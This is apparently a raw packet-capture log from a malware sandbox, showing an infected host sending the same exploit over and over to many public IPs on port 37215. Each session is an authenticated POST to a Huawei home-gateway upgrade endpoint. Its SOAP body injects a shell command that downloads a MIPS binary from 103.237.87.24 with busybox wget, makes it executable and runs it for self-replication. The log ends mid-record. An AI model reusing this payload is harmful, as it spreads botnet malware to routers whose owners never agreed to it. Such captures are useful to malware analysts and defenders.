                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1434192.168.2.1334276104.48.168.7037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.483772993 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1435192.168.2.1336084185.41.132.22237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.483787060 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1436192.168.2.1359866197.81.102.14737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.483793974 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1437192.168.2.135804241.219.166.10037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.484251022 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1438192.168.2.135809241.149.15.1937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.484311104 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1439192.168.2.1358722197.141.136.6437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.484312057 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1440192.168.2.1349148197.101.71.9737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.484334946 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1441192.168.2.1332986157.57.179.12337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.484361887 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1442192.168.2.1356506197.163.166.23737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.484370947 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1443192.168.2.1355736149.188.228.23937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.484385014 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 